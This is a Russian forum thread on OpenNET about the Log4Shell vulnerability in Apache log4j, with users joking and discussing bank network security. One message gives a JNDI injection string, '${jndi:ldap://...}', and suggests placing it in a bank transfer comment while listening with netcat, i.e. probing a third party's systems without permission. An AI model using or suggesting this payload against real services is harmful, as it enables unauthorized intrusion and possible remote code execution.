The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

Катастрофическая уязвимость в Apache log4j, затрагивающая многие Java-проекты, opennews (??), 10-Дек-21, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


46. "Катастрофическая уязвимость в Apache log4j, затрагивающая мн..."  +1 +/
Сообщение от Аноним (-), 10-Дек-21, 11:10 
Для того чтобы понять почему катастрофическая запусти у себя netcat на порту 389, отправь на карту или счёт в другом банке любой перевод с  ${jndi:ldap://твой_IP/test} в комментарии и насладись сколько вего разного к тебе полезет :-)
Ответить | Правка | К родителю #1 | Наверх | Cообщить модератору

54. "Катастрофическая уязвимость в Apache log4j, затрагивающая мн..."  +8 +/
Сообщение от Онаним (?), 10-Дек-21, 11:39 
Главное чтобы маски-шоу из категории разного в дверь и окна не полезли.
Ответить | Правка | Наверх | Cообщить модератору

55. "Катастрофическая уязвимость в Apache log4j, затрагивающая мн..."  +/
Сообщение от Онаним (?), 10-Дек-21, 11:40 
Поэтому лучше IP конечно не свой :)
Ответить | Правка | К родителю #46 | Наверх | Cообщить модератору

84. "Катастрофическая уязвимость в Apache log4j, затрагивающая мн..."  +/
Сообщение от Аноним (84), 10-Дек-21, 13:19 
И с чужого банковского счёта перевод делать, ага
Ответить | Правка | Наверх | Cообщить модератору

60. "Катастрофическая уязвимость в Apache log4j, затрагивающая мн..."  +/
Сообщение от Аноним (60), 10-Дек-21, 11:53 
В банках доступ в интернет, да даже в соседний vlan закрыт. Так что ищите где-то еще.
Ответить | Правка | К родителю #46 | Наверх | Cообщить модератору

68. "Катастрофическая уязвимость в Apache log4j, затрагивающая мн..."  +2 +/
Сообщение от Аноним (68), 10-Дек-21, 12:28 
И как вы online-банком если всё закрыто пользуйтесь? Только не говорите, что там исходящие соединения блокируются, это у единиц.
Ответить | Правка | Наверх | Cообщить модератору

137. "Катастрофическая уязвимость в Apache log4j, затрагивающая мн..."  –1 +/
Сообщение от пох. (?), 11-Дек-21, 08:54 
Да нет, дол-еов тыщи же ж.
Вспоминая один из самых круто-обинтернетившихся в первых рядах Аван-гад 2010го примерно года розлива. Все ок, все пакеты кроме 443го tcp/established были заблокированы намертво. Все. Вообще все.

pmtud? Клиенты с pppoe у которых mtu не 1500 по всему линку ? Неееееа, не слышали!

А сделать ГРАМОТНО - это надо нанимать специалиста. Я ходил когда-то пособеседоваться. Мне сказали - "э... да я сам не знаю зачем тебе позвонил - нам такого не надо, нам бы попроще кого - ну там с ripe уметь переписываться и крошки со стола вытирать. А ты overqualified, иди найух."

Ну а иногда и специалист печально разводит руками, когда выясняется что госрегулятору надо нескучным restapi прямо на ходу что-то сливать и никак иначе. Причем то, куда сливать - в нескучном облачке мэйлcpy чтоб денег никому не платить. И где /18, в которой любой васян точно так же может поставить ханипот.

(тут тоже можно было бы побороться, но покажите мне банчок где ИБ может напрямую ставить задачи и менять ИТ проекты - "тут мы не нескучно дергаем libcurl, а разрабатываете отдельный прокси-сервер в отдельном изолированном сегменте, причем - с парсингом протокола а не безмозглым форвардом чего попало" - и приоритетнее чем задачи ставящиеся ошпаренными менеджерами по улучшайкингу)

Ответить | Правка | Наверх | Cообщить модератору

175. "Катастрофическая уязвимость в Apache log4j, затрагивающая мн..."  +/
Сообщение от Аноним (175), 27-Дек-21, 02:13 
Чё за поток сознания лол, иди таблеточки пропей
Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру